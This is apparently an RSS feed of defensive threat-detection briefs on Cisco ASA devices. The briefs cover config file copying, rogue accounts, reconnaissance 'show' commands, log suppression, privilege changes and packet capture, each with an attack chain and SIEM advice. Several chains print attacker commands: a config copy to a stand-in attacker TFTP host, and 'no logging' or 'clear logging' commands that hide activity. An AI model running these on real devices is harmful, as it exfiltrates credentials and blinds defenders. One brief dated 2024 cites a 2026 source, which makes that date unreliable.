<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Cisco ASA - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/cisco-asa/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Tue, 09 Jan 2024 10:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/cisco-asa/feed.xml" rel="self" type="application/rss+xml"/><item><title>Cisco ASA Device File Copy Activity</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-cisco-asa-file-copy/</link><pubDate>Tue, 09 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-cisco-asa-file-copy/</guid><description>Adversaries may copy device files, including configurations and packet captures, from Cisco ASA devices via CLI or ASDM for reconnaissance, credential extraction, or data exfiltration, which can be detected via command execution logs.</description><content:encoded><![CDATA[<p>This analytic detects file copy activity on Cisco ASA devices, potentially indicating malicious behavior. Attackers might copy device files, such as configurations (running-config, startup-config), logs, packet captures (pcap capture), or system files (disk0:, flash:, system:, capture:), via CLI or ASDM. This activity could be part of a reconnaissance phase, to extract credentials, or to exfiltrate sensitive data. While legitimate file operations do occur during backups and maintenance, unauthorized copies warrant investigation. This detection focuses on command execution events (message ID 111008 or 111010) containing copy commands. The activity may be associated with threat actors targeting perimeter network devices, such as those detailed in the Talos ArcaneDoor report.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to the Cisco ASA device, possibly through compromised credentials or a vulnerability (not specified in source).</li>
<li>The attacker authenticates to the ASA device via CLI or ASDM using valid credentials.</li>
<li>The attacker executes a <code>copy</code> command to copy sensitive files. This includes commands targeting running-config, startup-config, packet capture files (<code>/pcap capture:</code>), or system files from disk0:, flash:, system:, or capture: locations.</li>
<li>The ASA logs the command execution event with message ID 111008 or 111010.</li>
<li>The copied files are stored on the ASA's local storage (disk0:, flash:, etc.).</li>
<li>(Hypothetical) The attacker uses another command (e.g., <code>tftp</code>) to transfer the copied files off the ASA device to an attacker-controlled server.</li>
<li>(Hypothetical) The attacker extracts credentials from the configuration files or analyzes packet captures for sensitive information.</li>
<li>The attacker uses the extracted information for further lateral movement or data exfiltration.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows the attacker to access sensitive information, including device configurations and potentially network traffic data. Configuration files often contain usernames, passwords, and other sensitive information that can be used for lateral movement within the network. Packet captures may contain sensitive data transmitted over the network. This can lead to a complete compromise of the network infrastructure. The references indicate that nation-state actors may target these devices.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Cisco ASA syslog data ingestion into your SIEM via the Cisco Security Cloud TA to collect the necessary logs.</li>
<li>Configure your ASA and FTD devices to generate and forward message IDs 111008 and 111010 as outlined in the &quot;how_to_implement&quot; section.</li>
<li>Deploy the Sigma rule &quot;Cisco ASA Device File Copy Activity Detection&quot; to identify suspicious file copy commands executed on Cisco ASA devices.</li>
<li>Investigate any alerts generated by the Sigma rule &quot;Cisco ASA Device File Copy Activity Detection,&quot; especially those originating from non-administrative accounts or occurring during unusual hours.</li>
<li>Monitor command execution logs for unexpected use of the <code>copy</code> command, specifically targeting sensitive files and directories (running-config, startup-config, /pcap capture:, disk0:, flash:, system:, capture:).</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cisco</category><category>asa</category><category>file_copy</category><category>reconnaissance</category><category>credential_access</category><category>exfiltration</category></item><item><title>Cisco ASA - New Local User Account Creation</title><link>https://feed.craftedsignal.io/briefs/2024-01-04-cisco-asa-account-creation/</link><pubDate>Thu, 04 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-04-cisco-asa-account-creation/</guid><description>Detection of new user account creations on Cisco ASA devices, potentially indicating unauthorized access or persistence attempts by adversaries.</description><content:encoded><![CDATA[<p>This analytic detects the creation of new user accounts on Cisco ASA devices via CLI or ASDM. Adversaries may create unauthorized user accounts to establish persistence, maintain backdoor access, or elevate privileges on network infrastructure devices. These rogue accounts can provide attackers with continued access even after initial compromise vectors are remediated. The detection monitors for ASA message ID 502101, which is generated whenever a new user account is created on the device, capturing details including the username, privilege level, and the administrator who created the account. The source material was published by Splunk on 2026-04-17, highlighting the continued relevance of this threat.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial access to the Cisco ASA device via compromised credentials or exploitation of a vulnerability.</li>
<li>Attacker authenticates to the ASA device using the gained access.</li>
<li>Attacker executes commands to create a new local user account using the CLI or ASDM interface.</li>
<li>The ASA device generates syslog message ID 502101, indicating the new account creation, which includes the username, privilege level, and creating administrator.</li>
<li>The attacker assigns a high privilege level (e.g., level 15) to the new account.</li>
<li>Attacker uses the newly created account to maintain persistent access to the ASA device.</li>
<li>Attacker leverages the persistent access to perform reconnaissance, modify configurations, or disrupt network operations.</li>
<li>The attacker establishes a backdoor for future access, bypassing normal authentication mechanisms.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to unauthorized access to the network infrastructure, allowing attackers to modify configurations, intercept traffic, or disrupt services. This can result in data breaches, denial of service, and significant financial and reputational damage. While the specific number of victims or targeted sectors isn't available, the impact is significant for any organization relying on Cisco ASA devices for network security.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Ensure Cisco ASA devices are configured to generate and forward syslog message ID 502101 to a SIEM for monitoring to enable the provided detections.</li>
<li>Implement the provided Sigma rule <code>Cisco ASA - New Local User Account Created</code> to detect suspicious account creation activities.</li>
<li>Investigate any alerts generated by the Sigma rule, paying close attention to accounts with elevated privileges (level 15) and those created outside of normal business hours.</li>
<li>Review existing user accounts on Cisco ASA devices regularly, looking for any unauthorized or suspicious accounts.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cisco-asa</category><category>account-creation</category><category>persistence</category></item><item><title>Cisco ASA User Account Lockout Detection</title><link>https://feed.craftedsignal.io/briefs/2024-01-cisco-asa-account-lockout/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-cisco-asa-account-lockout/</guid><description>Detection of user account lockouts on Cisco ASA devices due to excessive failed authentication attempts, potentially indicating brute-force attacks, password spraying, or credential stuffing.</description><content:encoded><![CDATA[<p>This brief focuses on detecting account lockouts on Cisco ASA (Adaptive Security Appliance) devices. The increasing sophistication of cyberattacks means that organizations must monitor not just successful breaches, but also failed authentication attempts that may signal ongoing brute force attacks, password spraying campaigns, or credential stuffing attempts. The presence of these types of attacks indicate that credentials may have been compromised from external breaches and are being used to gain unauthorized access to network infrastructure. This analytic specifically leverages Cisco ASA message ID 113006, which signifies a user account lockout triggered by exceeding the permitted number of failed authentication attempts. This detection is crucial for defenders, as it enables timely response to potential unauthorized access attempts, protecting sensitive resources and maintaining network integrity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker attempts to authenticate to the Cisco ASA using compromised credentials or by guessing passwords.</li>
<li>The authentication attempts fail.</li>
<li>The Cisco ASA logs message ID 113006, indicating a failed authentication attempt.</li>
<li>The attacker continues to attempt authentication, exceeding the configured lockout threshold.</li>
<li>The Cisco ASA locks the user account, logging message ID 113006 with details of the account lockout and the failure threshold.</li>
<li>The detection rule triggers based on the 113006 event identifying the user account and originating host.</li>
<li>Security team investigates the lockout event, looking for associated malicious activity.</li>
<li>If confirmed malicious, the security team takes action to block the attacker and remediate the compromised account.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation could lead to unauthorized access to the network, potentially leading to data breaches, service disruption, or further lateral movement within the network. While a single account lockout might seem minor, a series of lockouts, especially affecting privileged accounts, could indicate a coordinated attack. Organizations in all sectors are vulnerable, with financial services and healthcare being particularly attractive targets.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Ingest Cisco ASA syslog data into Splunk via the Cisco Security Cloud TA to populate the <code>cisco_asa</code> macro.</li>
<li>Configure Cisco ASA devices to generate and forward message ID 113006 for account lockout events to Splunk.</li>
<li>Tune and deploy the Sigma rule &quot;Cisco ASA - User Account Lockout Detected&quot; to detect account lockouts.</li>
<li>Investigate alerts from the Sigma rule, focusing on privileged accounts, unusual source IP addresses, and multiple simultaneous lockouts.</li>
<li>Review and tune the lockout threshold on Cisco ASA devices based on your organization's security policies.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>authentication</category><category>brute_force</category><category>password_spraying</category><category>cisco_asa</category></item><item><title>Cisco ASA Reconnaissance Command Activity</title><link>https://feed.craftedsignal.io/briefs/2024-01-cisco-recon/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-cisco-recon/</guid><description>This analytic detects potential reconnaissance on Cisco ASA devices by identifying execution of multiple information-gathering 'show' commands within a short timeframe, indicating potential enumeration by an attacker.</description><content:encoded><![CDATA[<p>This detection identifies potential reconnaissance activities targeting Cisco ASA devices. Threat actors often perform reconnaissance against network infrastructure to understand device configurations, network topology, security policies, and potential attack paths. This involves executing multiple &quot;show&quot; commands to enumerate device details, running configurations, active connections, routing information, and VPN sessions. This activity is often a precursor to further malicious actions, such as lateral movement or data exfiltration. The detection specifically monitors for command execution events (message ID 111009) and triggers when 7 or more distinct reconnaissance commands are executed within a 5-minute window by the same user. This allows for detection of anomalous behavior within a network.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a network, potentially through compromised credentials or exploiting a vulnerability in an external-facing system.</li>
<li>The attacker leverages their access to connect to a Cisco ASA device.</li>
<li>The attacker executes a series of &quot;show&quot; commands via the ASA's command-line interface (CLI). These commands include &quot;show running-config&quot;, &quot;show version&quot;, &quot;show interface&quot;, &quot;show crypto&quot;, &quot;show conn&quot;, and others to gather information about the ASA's configuration and network environment.</li>
<li>The ASA logs these command executions with message ID 111009.</li>
<li>The attacker analyzes the output of the &quot;show&quot; commands to map the network topology, identify potential vulnerabilities, and discover sensitive information such as usernames, passwords, and VPN configurations.</li>
<li>Using the gathered information, the attacker identifies potential targets for lateral movement within the network.</li>
<li>The attacker pivots to other systems within the network, potentially using stolen credentials or exploiting identified vulnerabilities.</li>
<li>The attacker achieves their final objective, such as data exfiltration, system compromise, or denial-of-service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful reconnaissance can provide attackers with critical information needed to compromise network infrastructure, bypass security controls, and achieve their objectives. While the reconnaissance itself does not cause direct damage, it significantly increases the likelihood of a successful attack. A compromised ASA device can lead to network outages, data breaches, and unauthorized access to sensitive resources. The number of affected users/systems depends on the scope of the attacker's objective and the network's architecture.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Ensure Cisco ASA devices are configured to log command execution events with message ID 111009, following the guidance in the &quot;how_to_implement&quot; section.</li>
<li>Deploy the provided Sigma rule to your SIEM to detect reconnaissance activity based on multiple &quot;show&quot; command executions. Tune the threshold (unique_recon_commands &gt;= 7) based on your environment's baseline activity.</li>
<li>Investigate alerts generated by the Sigma rule, focusing on unusual source IP addresses, non-administrative accounts, and off-hours activity. Correlate reconnaissance activity with other suspicious events.</li>
<li>Adapt the detection filters to exclude known legitimate administrative activities, as mentioned in the &quot;known_false_positives&quot; section.</li>
<li>Regularly review and update ASA configurations to minimize the exposure of sensitive information through &quot;show&quot; commands, referring to the Cisco documentation provided in the references section.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cisco</category><category>reconnaissance</category><category>network</category></item><item><title>Cisco ASA Logging Message Suppression</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-logging-suppression/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-logging-suppression/</guid><description>Adversaries may suppress specific log message IDs on Cisco ASA devices using the 'no logging message' command to selectively disable logging of security-critical events and evade detection.</description><content:encoded><![CDATA[<p>This detection focuses on identifying the suppression of logging messages within Cisco ASA devices, a tactic used by adversaries to evade detection. Attackers leverage the &quot;no logging message&quot; command to selectively disable the logging of specific, security-critical events, such as authentication failures, configuration changes, or suspicious network activity. This approach allows them to maintain a degree of stealth while still allowing other logging functions to proceed normally, avoiding suspicion that might be raised by a complete disabling of logging. The detection specifically monitors for the execution of commands with message IDs 111008 and 111010 that include the &quot;no logging message&quot; command, which can suppress message IDs irrespective of the configured severity level. Identifying unauthorized or suspicious use of this command is crucial for maintaining auditability and detecting malicious activity within the network environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains unauthorized access to a Cisco ASA device, potentially through stolen credentials or exploiting a vulnerability.</li>
<li>The attacker executes the command <code>enable</code> to enter privileged EXEC mode.</li>
<li>The attacker then enters global configuration mode using the <code>configure terminal</code> command.</li>
<li>The attacker identifies security-critical message IDs, such as those related to authentication failures or configuration changes.</li>
<li>The attacker uses the <code>no logging message &lt;message_id&gt;</code> command to suppress logging for these specific message IDs. For example, <code>no logging message 111008</code>.</li>
<li>The ASA device ceases to log events associated with the suppressed message IDs, effectively hiding the attacker's actions.</li>
<li>The attacker performs malicious actions on the network, knowing that these actions will not be logged.</li>
<li>The attacker exits configuration mode and privileged EXEC mode, leaving the ASA device with suppressed logging.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful suppression of logging messages can severely hinder incident response and forensic investigations. If critical security events are not logged, administrators will be unaware of malicious activities occurring on the network. This can lead to delayed detection of breaches, data exfiltration, or other significant security incidents. The NCSC report referenced in the related articles details the use of similar techniques by advanced persistent threat (APT) groups to maintain persistence and evade detection on compromised systems, which highlights the potential impact of this tactic.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Cisco ASA syslog data ingestion into your SIEM using the Cisco Security Cloud TA, as required by the detection [How To Implement].</li>
<li>Configure Cisco ASA devices to generate and forward message IDs 111008 and 111010, or adjust the logging level to include these messages if needed [How To Implement].</li>
<li>Deploy the Sigma rule &quot;Cisco ASA Logging Message Suppression Detected&quot; to identify instances of logging message suppression [rules].</li>
<li>Investigate any detected instances of message suppression, focusing on unauthorized suppressions of security-critical message IDs, suppressions by non-administrative accounts, and suppressions occurring during unusual hours [description].</li>
<li>Establish a baseline of approved suppressed message IDs and monitor for deviations from this baseline [known_false_positives].</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cisco-asa</category><category>logging</category><category>defense-evasion</category><category>network</category></item><item><title>Cisco ASA User Privilege Level Change Detection</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-privilege-escalation/</link><pubDate>Wed, 03 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-privilege-escalation/</guid><description>Detection of unauthorized privilege level changes on Cisco ASA devices, potentially indicating privilege escalation or persistence attempts by threat actors.</description><content:encoded><![CDATA[<p>This threat brief focuses on the detection of unauthorized privilege level modifications on Cisco ASA (Adaptive Security Appliance) devices. Threat actors may attempt to escalate privileges to gain elevated access to network infrastructure, enable additional command execution capabilities, or establish higher-level persistent access. This is achieved by modifying user account privilege levels, which range from 0 (lowest) to 15 (full administrative access). The detection strategy leverages Cisco ASA message ID 502103, triggered when a user account's privilege level is modified. This event captures crucial information, including the username, the administrator responsible for the change, and both the original and the new privilege levels. Defenders should investigate unexpected privilege changes, with particular attention to escalations to level 15, substantial privilege increases, modifications performed outside of established business hours, changes initiated by non-administrative users, or changes lacking proper change management documentation.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li><strong>Initial Access:</strong> An attacker gains initial access to a low-privilege user account on the Cisco ASA, possibly through compromised credentials or social engineering.</li>
<li><strong>Reconnaissance:</strong> The attacker uses the compromised account to enumerate existing user accounts and their current privilege levels using CLI commands like <code>show user</code>.</li>
<li><strong>Privilege Escalation Attempt:</strong> The attacker attempts to modify the privilege level of a target account (potentially their own) using commands like <code>username &lt;user&gt; privilege &lt;level&gt;</code> via CLI or ASDM.</li>
<li><strong>Authentication:</strong> The ASA requires authentication for the privilege escalation attempt, often requiring administrator credentials. The attacker might attempt to brute-force or bypass this authentication.</li>
<li><strong>Privilege Level Change:</strong> If successful, the attacker elevates the target account's privilege level. Message ID 502103 is generated, logging the change.</li>
<li><strong>Command Execution:</strong> With elevated privileges, the attacker can now execute privileged commands, modify network configurations, and potentially compromise the entire ASA device.</li>
<li><strong>Persistence:</strong> The attacker may create new high-privilege accounts or modify existing ones to ensure continued access, even if the initial compromised account is discovered and disabled.</li>
<li><strong>Lateral Movement:</strong> The attacker uses the compromised ASA as a pivot point to gain access to other systems on the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised Cisco ASA devices can lead to significant damage, including unauthorized network access, data breaches, and disruption of network services. A successful privilege escalation can grant attackers complete control over the network infrastructure. The NCSC's analysis of RayInitiator/LINE-VIPER malware highlights the potential for attackers to leverage compromised network devices for lateral movement and data exfiltration. The scope of impact depends on the organization's size and the criticality of the network services provided by the ASA.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable and forward Cisco ASA syslog data, including message ID 502103, to your SIEM using the Cisco Security Cloud TA, as required by the detection rules below.</li>
<li>Deploy the provided Sigma rule <code>Cisco ASA User Privilege Level Change Detected</code> to detect privilege level changes and tune it for your environment.</li>
<li>Investigate any alerts generated by the Sigma rule, paying close attention to escalations to privilege level 15, substantial increases in privilege levels, and changes made outside of normal business hours.</li>
<li>Correlate privilege level change events (message ID 502103) with other security events, such as failed login attempts or suspicious network activity, to identify potential compromise.</li>
<li>Regularly review user accounts and their privilege levels on Cisco ASA devices.</li>
<li>Implement strong password policies and multi-factor authentication for all ASA administrator accounts.</li>
<li>Refer to the Cisco documentation linked in the references to configure and monitor ASA logging effectively.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cisco-asa</category><category>privilege-escalation</category><category>persistence</category><category>network</category></item><item><title>Cisco ASA User Account Deletion</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-account-deletion/</link><pubDate>Wed, 03 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-account-deletion/</guid><description>Detection of user account deletion on Cisco ASA devices, potentially indicating adversary attempts to cover tracks, disrupt incident response, or deny administrator access.</description><content:encoded><![CDATA[<p>This brief focuses on the detection of user account deletions on Cisco ASA devices, a tactic commonly employed by adversaries to obfuscate their activities within a compromised network. The deletion of user accounts, particularly those with elevated privileges (level 15), can serve to remove evidence of malicious actions, hinder incident response efforts, or deny legitimate administrators access to critical systems. This activity can also be a sign of hiding temporary account creation used during a compromise. This analytic relies on monitoring Cisco ASA logs for message ID 502102, which is triggered upon the deletion of a local user account. This event captures valuable information, including the username, privilege level, and the administrator responsible for the deletion. It is crucial to investigate unexpected or unauthorized account deletions, especially those occurring outside of normal business hours or involving privileged accounts.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial Access: Adversary gains initial access to a system with valid credentials or exploits a vulnerability.</li>
<li>Privilege Escalation: The attacker elevates privileges to gain administrative access to the Cisco ASA device.</li>
<li>Account Discovery: The attacker enumerates existing user accounts on the Cisco ASA device to identify potential targets for deletion.</li>
<li>Account Deletion: The adversary deletes a local user account on the Cisco ASA device, generating syslog message ID 502102.</li>
<li>Log Manipulation (Optional): Attempts to further cover tracks by disabling logging or manipulating the ASA's logging configuration.</li>
<li>Persistence (Obstructed): By deleting accounts, legitimate user's persistence is removed and access to the system is revoked.</li>
<li>Defense Evasion: The attacker attempts to evade detection by deleting accounts used during the compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful deletion of user accounts can disrupt incident response efforts by removing valuable forensic data and hindering the ability to track the attacker's activities. It can also lead to denial-of-service for legitimate users who rely on those accounts for access. Privileged account deletion can result in significant operational disruption and potential data breaches due to loss of control over critical systems.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable and forward Cisco ASA syslog data, specifically message ID 502102, to your SIEM for analysis as detailed in the &quot;how_to_implement&quot; section.</li>
<li>Deploy the Sigma rule &quot;Cisco ASA - User Account Deletion Detected&quot; to your SIEM and tune the filter list to exclude known benign account deletions.</li>
<li>Investigate any instances of message ID 502102, cross-referencing with HR records and change management systems to identify unauthorized account deletions as described in the description.</li>
<li>Monitor ASA logging configurations for unauthorized changes that could indicate log manipulation attempts.</li>
<li>Review the &quot;references&quot; link to understand the context of ASA message ID 502102 within the overall ASA syslog architecture.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cisco_asa</category><category>account_deletion</category><category>defense_evasion</category></item><item><title>Cisco ASA Device File Copy to Remote Location</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-file-copy/</link><pubDate>Wed, 03 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-cisco-asa-file-copy/</guid><description>The analytic detects file copy operations from Cisco ASA devices to remote locations using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP, potentially indicating data exfiltration by threat actors targeting network devices.</description><content:encoded><![CDATA[<p>This detection identifies file copy operations from Cisco ASA devices to remote locations, which could signal data exfiltration attempts. Threat actors targeting network infrastructure may attempt to exfiltrate sensitive data, including device configurations, logs, and packet captures, to attacker-controlled infrastructure. The analytic focuses on detecting unusual copy commands executed via the CLI or ASDM interface. Specifically, it monitors Cisco ASA logs (message IDs 111008 and 111010) for copy commands using protocols like TFTP, FTP, HTTP, HTTPS, SMB, or SCP. Legitimate backups to centralized servers are common, however copies to unexpected or external destinations are suspicious. This activity is associated with threat actors targeting perimeter network devices, like the ArcaneDoor campaign. Defenders should investigate copies to unexpected destinations, from non-administrative accounts, or outside approved maintenance windows.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to the Cisco ASA device, possibly through compromised credentials or exploiting a vulnerability.</li>
<li>Attacker authenticates to the ASA device via SSH, Telnet, CLI, or ASDM.</li>
<li>Attacker executes commands to copy sensitive files, such as the running configuration (<code>running-config</code>) or startup configuration (<code>startup-config</code>).</li>
<li>The <code>copy</code> command is used with a remote protocol (TFTP, FTP, HTTP, HTTPS, SMB, SCP) to specify the destination server. For example, <code>copy running-config tftp://&lt;attacker_ip&gt;/config.txt</code>.</li>
<li>The ASA device initiates a network connection to the attacker-controlled server using the specified protocol.</li>
<li>The sensitive file is transferred to the remote server.</li>
<li>Attacker uses exfiltrated data to gain further knowledge of the network environment or for malicious purposes.</li>
<li>The attacker attempts to remove evidence of the file copy operation from the ASA device's logs.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exfiltration of Cisco ASA device configurations and logs can provide attackers with valuable information about network topology, security policies, usernames, passwords and other sensitive data. This information can be used to facilitate further attacks, such as lateral movement within the network, compromising additional systems, or gaining unauthorized access to sensitive resources. Organizations in any sector could be affected if their perimeter security devices are compromised.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Cisco ASA syslog logging and ensure message IDs 111008 and 111010 are captured to enable this detection.</li>
<li>Deploy the Sigma rule <code>Cisco ASA - Device File Copy to Remote Location</code> to your SIEM and tune the filters to exclude known legitimate backup activities.</li>
<li>Investigate any alerts generated by the Sigma rule, paying close attention to the destination IP address, user account, and time of the activity.</li>
<li>Monitor network traffic for connections originating from Cisco ASA devices to external IP addresses using file transfer protocols (TFTP, FTP, HTTP, HTTPS, SMB, SCP).</li>
<li>Review and restrict access to Cisco ASA devices, enforcing strong password policies and multi-factor authentication to prevent unauthorized access.</li>
<li>Implement network segmentation to limit the impact of a compromised ASA device.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cisco-asa</category><category>data-exfiltration</category><category>network-device</category></item><item><title>Cisco ASA Packet Capture Activity</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-cisco-asa-packet-capture/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-cisco-asa-packet-capture/</guid><description>Detection of packet capture commands on Cisco ASA devices indicates potential network sniffing for credential theft, sensitive data interception, or network traffic analysis by adversaries.</description><content:encoded><![CDATA[<p>This analytic detects the execution of packet capture commands on Cisco ASA devices via CLI or ASDM. Adversaries might abuse the built-in packet capture functionality to perform network sniffing, intercept credentials transmitted over the network, capture sensitive data in transit, or gather intelligence about network traffic patterns and internal communications. Packet captures can reveal usernames, passwords, session tokens, and confidential business data. The detection focuses on command execution events (message ID 111008 or 111010) that include &quot;capture&quot; commands, which are used to initiate packet capture sessions on specific interfaces or for specific traffic patterns on the ASA device. This activity is associated with threat actors like LINE VIPER, as documented by NCSC. Detecting unauthorized packet capture activities, especially those targeting sensitive interfaces or involving unusual configurations, is critical for identifying potential intrusions.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains unauthorized access to a Cisco ASA device via compromised credentials or exploiting a vulnerability.</li>
<li>The attacker authenticates to the ASA device using CLI or ASDM.</li>
<li>The attacker executes the &quot;configure terminal&quot; command to enter global configuration mode.</li>
<li>The attacker uses the &quot;capture&quot; command to define a packet capture session, specifying interfaces, traffic patterns, and filters. For example, <code>capture capin interface inside match ip any any</code>.</li>
<li>The ASA device starts capturing network traffic based on the defined parameters.</li>
<li>The attacker retrieves the captured traffic data for analysis, potentially exfiltrating the data to an external server.</li>
<li>The attacker analyzes the captured data to identify sensitive information, such as usernames, passwords, session tokens, or confidential business data.</li>
<li>The attacker uses the stolen credentials or data to further compromise the network or exfiltrate sensitive information.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows attackers to perform extensive network reconnaissance and potentially steal sensitive credentials and data. This could lead to further compromise of internal systems, data breaches, and financial loss. While specific victim counts are unavailable, the impact is significant due to the potential for widespread data compromise and disruption of network operations. The references note association with advanced actors who use captured data to further their campaigns.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Cisco ASA syslog data ingestion into your SIEM via the Cisco Security Cloud TA to ensure the <code>cisco_asa</code> macro is populated (How_to_implement).</li>
<li>Configure Cisco ASA devices to generate and forward message IDs 111008 and 111010, adjusting syslog levels as needed based on the instructions in the &quot;How_to_implement&quot; section.</li>
<li>Deploy the provided Sigma rule &quot;Cisco ASA - Suspicious Packet Capture Configuration&quot; to detect unusual packet capture configurations and tune the rule for your environment (rules).</li>
<li>Review and investigate any alerts generated by the Sigma rule, focusing on captures targeting sensitive interfaces, large traffic volumes, or unusual filter criteria.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cisco_asa</category><category>network_sniffing</category><category>credential_access</category></item><item><title>Cisco ASA Logging Disabled via CLI</title><link>https://feed.craftedsignal.io/briefs/2024-01-02-cisco-asa-logging-disabled/</link><pubDate>Tue, 02 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-02-cisco-asa-logging-disabled/</guid><description>Detection of adversaries or malicious insiders disabling logging on a Cisco ASA device via CLI commands, hindering detection and hiding malicious activity.</description><content:encoded><![CDATA[<p>This analytic focuses on detecting the disabling of logging functionality on Cisco ASA devices, a common tactic employed by adversaries and malicious insiders to evade detection and obscure malicious activities. The activity is identified by monitoring Cisco ASA syslog messages associated with command execution. Specifically, the detection triggers on syslog message IDs 111008 and 111010, coupled with the execution of commands indicative of logging manipulation, such as <code>no logging</code>, <code>logging disable</code>, <code>clear logging</code>, or <code>no logging host</code>. This tactic is a strong indicator of defense evasion, as disabling logging on security appliances like firewalls significantly reduces the visibility of malicious actions. This is a common post-compromise technique.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains unauthorized access to the Cisco ASA device, potentially through compromised credentials or exploiting a vulnerability.</li>
<li>The attacker authenticates to the ASA's CLI, possibly using stolen credentials.</li>
<li>The attacker executes a command to disable logging, such as <code>no logging</code>, <code>logging disable</code>, <code>clear logging</code>, or <code>no logging host</code>. This action is designed to prevent the recording of their subsequent activities.</li>
<li>The Cisco ASA generates a syslog message with message ID 111008 or 111010, indicating that a command has been executed.</li>
<li>With logging disabled, the attacker performs malicious activities, such as modifying firewall rules, establishing unauthorized VPN connections, or exfiltrating sensitive data.</li>
<li>Because logging is disabled, these malicious activities are not recorded in the ASA's logs, making them difficult to detect.</li>
<li>The attacker attempts to cover their tracks further by clearing any remaining logs or audit trails.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful disabling of logging can severely impair an organization's ability to detect and respond to security incidents. With logging disabled, malicious activities can go unnoticed, leading to data breaches, system compromise, and financial losses. The impact is magnified by the fact that Cisco ASA devices are often critical components of network security infrastructure. The number of victims can range from single organizations to multiple entities if the attacker is able to compromise multiple ASA devices.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Cisco ASA Logging Disabled via CLI</code> to your SIEM and tune for your environment to detect attempts to disable logging functionality.</li>
